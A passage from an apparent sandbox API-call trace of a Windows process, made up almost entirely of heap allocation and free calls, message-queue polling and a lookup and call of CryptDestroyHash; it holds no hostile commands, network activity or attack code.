hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.529] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.530] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.530] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.530] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.531] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.531] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.531] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.531] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.532] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.532] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.532] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0261.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.533] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.534] CryptDestroyHash (hHash=0xaa5920) returned 1 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.536] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0261.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: 